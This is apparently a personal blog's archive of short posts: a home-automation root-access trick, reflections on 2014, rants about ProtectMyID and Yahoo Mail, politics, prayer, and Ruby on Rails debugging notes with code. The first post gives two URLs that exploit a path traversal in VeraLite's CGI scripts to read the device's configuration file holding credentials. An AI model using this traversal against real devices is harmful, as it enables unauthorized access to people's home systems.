how to hack the veralite to get ssh root password

Home automation hardware is among the worst products out there, security-wise.
Today I wanted to log into my veralite, but I forgot the root password.
In no more than 30 minutes, I found a way to gain root.

Source: https://www3.trustwave.com/spiderlabs/advisories/TWSL2013-019.txt

First go here
http://A.B.C.D/cgi-bin/cmh/store_file.sh?store_file=test

Then go here
http://A.B.C.D/cgi-bin/cmh/get_file.sh?filename=../../../../../etc/cmh/cmh.conf

Then cry, because I just realized my home devices are open to anyone…

Goodbye 2014 – the year of falling behind

While my life is always hovering at great, 2014 has been on the lower spectrum of greatness.

It’s best illustrated with this experience I had in 2014.

So on my 31st, I was driving around to do some errands. I was feeling pretty good. I was thinking to myself, I have great friends, family, and fortune. Nothing to complain about.

Just at that moment, five Ferraris passed me on the freeway.

While I don’t think that expensive cars are an adequate barometer of success, that experience perfectly illustrates how I’ve felt all year — falling behind.

Many of my peers are now doctors, lawyers, and internet millionaires. Others are on their second kid, building that perfect nuclear family.

Me. I just want 2015 to be the year for my success.

ProtectMyID sucks

So after the Target breach, I signed up for the free credit monitoring service they offered: ProtectMyID.

Since then, I have opened a credit card, and brought into use a credit card I have not used in months. I think I also closed an account and changed the credit limit on another…

No alerts from ProtectMyID….

How the hell is this service supposed to protect anyone, if they can’t even pick up simple shit like that. Weaksauce.

The Roosevelts

I am watching this new Roosevelt documentary on PBS and I am blown away by how great the Roosevelts were, especially Eleanor.

In the 1930s, a time before civil rights or any sort of real social awareness, she was working for civil rights, women’s rights, economic equality, international aid, and even perhaps a hint at acceptance of homosexuality.

I am also blown away at how Obama’s presidency mimics FDR’s presidency, right down to the kind of insults they hurled at him. Apparently the bankers refused to call FDR “president” and referred to him as the man in the white house.

It’s also interesting that they used the Supreme Court to obstruct FDR. We have the exact same problems today.

ISIS is to Obama as Hitler’s Germany is to FDR.

Oh yea, but they were terrible parents.

Rails test fixtures and foreign_key

I learned something about Rails fixtures that took me a while to figure out:

So the standard fixture reference example is

    # In fixtures/categories.yml
    about:
      name: About

    # In fixtures/articles.yml
    one:
      title: Welcome to Rails!
      body: Hello world!
      category: about

But what if I had in my model

    class Articles < ActiveRecord::Base
      belongs_to :category, foreign_key: :subject_id
    end

I was thinking that since my Articles object only has a subject_id attribute, I would have to specify subject_id in the .yml

But nope, apparently you can just use category and Rails will automatically put it into the correct foreign_key field, which in this case is subject_id.
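A small stand-alone simulation of what the fixture loader does with that category: about line, written for this post (it is not Rails' own code): it parses the two fixture files above, derives each fixture's id the way Rails does (assumed here: the CRC32-based label hash), and rewrites the association label into the subject_id column that belongs_to declares. The association map is a hand-written stand-in for the model's belongs_to reflection.

```ruby
require "yaml"
require "zlib"

# Constructed copies of the two fixture files from the post.
CATEGORIES_YML = <<~YAML
  about:
    name: About
YAML

ARTICLES_YML = <<~YAML
  one:
    title: Welcome to Rails!
    body: Hello world!
    category: about
YAML

# Stand-in for the belongs_to reflection on the model:
# association name => foreign key column (assumed shape for this example).
ARTICLE_ASSOCIATIONS = { "category" => "subject_id" }.freeze

MAX_ID = 2**30 - 1

# Stable integer id derived from a fixture label; the CRC32 formula is the one
# Rails' fixture loader uses (assumption: unchanged across the versions in play).
def fixture_id(label)
  Zlib.crc32(label.to_s) % MAX_ID
end

# Rewrite one fixture row: an attribute named like a belongs_to association is
# replaced by the association's foreign key column holding the referenced id.
def resolve_row(row, associations)
  row.each_with_object({}) do |(attr, value), out|
    if (fk = associations[attr])
      out[fk] = fixture_id(value)   # "category: about" -> "subject_id: <id of :about>"
    else
      out[attr] = value
    end
  end
end

# Ids assigned to the category fixtures, so the join can be checked.
def category_ids
  YAML.safe_load(CATEGORIES_YML).keys.map { |label| [label, fixture_id(label)] }.to_h
end

# The articles fixture rows as they would be inserted into the table.
def resolved_articles
  YAML.safe_load(ARTICLES_YML).transform_values { |row| resolve_row(row, ARTICLE_ASSOCIATIONS) }
end
```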

Yahoo mail is terrible

I’ve been using Yahoo Mail the last couple of days, and that shit is so terrible, I had to write this blog post about it.

1. It’s as slow as a snail — Something is definitely wrong with the JavaScript engine on Yahoo Mail. Clicking between folders is significantly laggy and sometimes it just bugs out and won’t load.

2. Mail delivery and receiving is not instant — I’ve had mail that did not arrive for over 10 minutes. WTF… I don’t think I’ve ever seen anything like this on any other mail program I’ve used.

3. The default font is like 7pt. What the hell.

4. Spam filtering is bonkers — They put half of my mail in spam. I keep marking things as not spam, but it doesn’t seem to change anything.

5. Why the fck do they keep asking me to create a public profile?? — This is like that whole G+ fiasco. I just wanted to change the name on my email, but I could not do it until I signed up for their public profile.

Stop using Yahoo Mail. It’s terrible.

Bill and Melinda Gates commencement speech at Stanford

http://news.stanford.edu/news/2014/june/gates-commencement-remarks-061514.html

You don’t even have to leave your computer to see that people have no idea what poverty and suffering looks like outside of our borders.

Go to a liberal news source like reddit, nytimes, npr, etc. and read the comment section of stories about the new influx of illegal minors crossing the border.

You will see that the top comments are something like “these people are terrible parents”.

That kind of sentiment shows a complete lack of understanding about the degree of suffering people are facing.

The desperation that forces parents to send their children to make a perilous trek across the desert should not be perceived as bad parenting, but as a horrific reminder that those people’s normal lives are WORSE.

Like Melinda Gates said, “there is no difference at all in what we want for our children”.

I did not arrive at this understanding because I possess some sort of superior capacity for empathy. In fact, I am usually chided for lacking empathy.

The only reason I understand this dilemma so well is because I know many Vietnamese parents who’ve made the same choices.

They put their entire family, fortunes, hopes and dreams in small boats and headed out to sea risking starvation, drowning, and piracy. But at that time, it was the “better” alternative.

The power of prayers

One thing that I miss about being religious is having the option to pray.

For non-religious people, the act of praying may look awfully weird. Like a child writing a Christmas wish list to Santa Claus.

But that’s not how I experienced prayers. It was more like having a quiet moment to sit down and talk to a close friend and counselor who is a great listener.

And the power of prayer did not come from the hope that God would use his power to make your problems go away. I never believed that God would answer my prayers by letting me win the lottery, or strike down my enemies. Instead, the power of prayer came from the peace of mind that you get after praying.

Religious people have great imagery for this: Footprints in the Sand.

For example, when something sad happens in my life, like when a family member gets sick, I used prayer to deal with the sadness and powerlessness of the situation. Or when something exciting and unpredictable happened, like when I applied for college, I relied on prayer to assure myself that everything was going to be OK and it would all work out.

I understand that it’s all psychological and there are many alternatives such as therapy, drugs, or even yoga…. and that’s fine. But prayer works and it’s free.

Nowadays, I don’t have that option in my toolset.

When shitty things happen, I just stare blankly into space. I don’t know who to turn to, or what to think. The uncertainty of life is just that: uncertain.

TypeError: can’t convert ActiveSupport::Duration into time interval

    Timeout::timeout(6.hours){}
    TypeError: can't convert ActiveSupport::Duration into time interval

One of those stupid bugs that shows up in one environment, but not the other.
Both environments are running the exact same version of Ruby (1.8.7), Rails (2.3.4), and ActiveSupport (2.3.4).

The confusing thing is, on the environment where that works, this does NOT:

    sleep(6.hours)

Which is the correct behavior. But why would Timeout::timeout work??

Looking through the ActiveSupport source yielded nothing of value.

I know the solution is:

    Timeout::timeout(6.hours.to_i){}

But I just want to understand why.

UPDATE: I was wrong. I was using Ruby 1.8.7 on one environment and Ruby 1.8.7 EE (Enterprise Edition) on the other.

In Ruby 1.8.7 EE, the Timeout::timeout method is different.

It does not re-raise a failure from sleep into the calling thread; the TypeError simply kills the watcher thread, so the block runs with no timeout enforced at all:

    y = Thread.start {
      sleep sec
      x.raise exception, "execution expired" if x.alive?
    }

whereas plain Ruby 1.8.7 does:

    y = Thread.start {
      begin
        sleep sec
      rescue => e
        x.raise e
      else
        x.raise exception, "execution expired" if x.alive?
      end
    }
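To see the difference, here is an added example (not from the post, and not either Ruby's actual Timeout code) that reproduces the two watcher threads shown above as plain functions and feeds them a value that sleep cannot convert, standing in for an ActiveSupport::Duration. The EE-style watcher lets the block run to completion with no deadline; the plain 1.8.7 watcher surfaces the TypeError to the caller. With a plain number, as 6.hours.to_i gives, both fire on time.

```ruby
require "timeout"

# Silence the thread-termination report so the EE-style watcher dies quietly.
Thread.report_on_exception = false if Thread.respond_to?(:report_on_exception=)

# Plain Ruby 1.8.7 watcher: a failure inside sleep is re-raised in the caller.
def timeout_mri(sec)
  x = Thread.current
  y = Thread.start {
    begin
      sleep sec
    rescue => e
      x.raise e
    else
      x.raise Timeout::Error, "execution expired" if x.alive?
    end
  }
  yield
ensure
  y.kill if y && y.alive?
end

# Ruby 1.8.7 EE watcher: a TypeError from sleep kills only the watcher thread.
def timeout_ee(sec)
  x = Thread.current
  y = Thread.start {
    sleep sec
    x.raise Timeout::Error, "execution expired" if x.alive?
  }
  yield
ensure
  y.kill if y && y.alive?
end

# Stand-in for ActiveSupport::Duration: an object sleep cannot convert.
BAD_INTERVAL = "6 hours".freeze
# :type_error if the bad interval is surfaced, :completed if the block just ran.
def outcome_with_bad_interval(impl)
  send(impl, BAD_INTERVAL) { sleep 0.2; :completed }
rescue TypeError
  :type_error
end

# With a plain number (what 6.hours.to_i yields) both watchers fire on time.
def deadline_enforced?(impl)
  send(impl, 0.05) { sleep 1; false }
rescue Timeout::Error
  true
end
```

Thread.report_on_exception is only lowered so the dying watcher stays quiet on modern Ruby, which is exactly what made the bug invisible on EE.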

Rails SSL – certificate verify failed

Woke up one morning to find that the outbound SSL connections my app (Ubuntu / Apache2 / Ruby on Rails) was trying to make were no longer working (they had worked just fine the day before), failing with the following error:

    OpenSSL::SSL::SSLError: SSL_connect returned=1 errno=0 state=SSLv3 read server certificate B: certificate verify failed

It took a frustrating couple of hours digging around, and ending up on several unhelpful stackoverflow answers, for me to come to this conclusion:

The bundle of trusted CA certificates on my server was out of date:

    /etc/ssl/certs/ca-certificates.crt

The fix: Find the latest version of ca-certificates.crt and replace it.
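An added check, not part of the original post, that audits a PEM bundle like /etc/ssl/certs/ca-certificates.crt for roots whose validity has already ended, which is the kind of stale entry that produces "certificate verify failed" out of nowhere. Because a real bundle cannot be embedded here, it falls back to a constructed two-certificate sample bundle when the system file is absent; make_root, parse_bundle and expired_subjects are names chosen for this example.

```ruby
require "openssl"

# Self-signed root with the given validity window (constructed test data only;
# a real bundle cannot be embedded here).
def make_root(common_name, not_before, not_after)
  key  = OpenSSL::PKey::RSA.new(2048)
  cert = OpenSSL::X509::Certificate.new
  cert.version = 2
  cert.serial  = 1
  cert.subject = cert.issuer = OpenSSL::X509::Name.parse("/CN=#{common_name}")
  cert.public_key = key.public_key
  cert.not_before = not_before
  cert.not_after  = not_after
  cert.sign(key, OpenSSL::Digest.new("SHA256"))
  cert.to_pem
end

# Split a PEM bundle such as /etc/ssl/certs/ca-certificates.crt into certificates.
def parse_bundle(pem_text)
  pem_text.scan(/-----BEGIN CERTIFICATE-----.*?-----END CERTIFICATE-----/m)
          .map { |pem| OpenSSL::X509::Certificate.new(pem) }
end

# Subjects of every certificate in the bundle whose validity has already ended.
def expired_subjects(pem_text, now = Time.now)
  parse_bundle(pem_text).select { |c| c.not_after < now }.map { |c| c.subject.to_s }
end

DAY = 24 * 3600

# Constructed bundle: one root that expired yesterday, one valid for years.
def sample_bundle
  now = Time.now
  make_root("Expired Test Root", now - 730 * DAY, now - DAY) +
    make_root("Valid Test Root", now - DAY, now + 5 * 365 * DAY)
end

if __FILE__ == $0
  path = "/etc/ssl/certs/ca-certificates.crt"
  text = File.exist?(path) ? File.read(path) : sample_bundle
  expired = expired_subjects(text)
  puts(expired.empty? ? "no expired roots in bundle" : expired)
end
```

On Ubuntu that file is generated from the ca-certificates package by update-ca-certificates, so updating that package is the supported way to replace it rather than editing the file by hand.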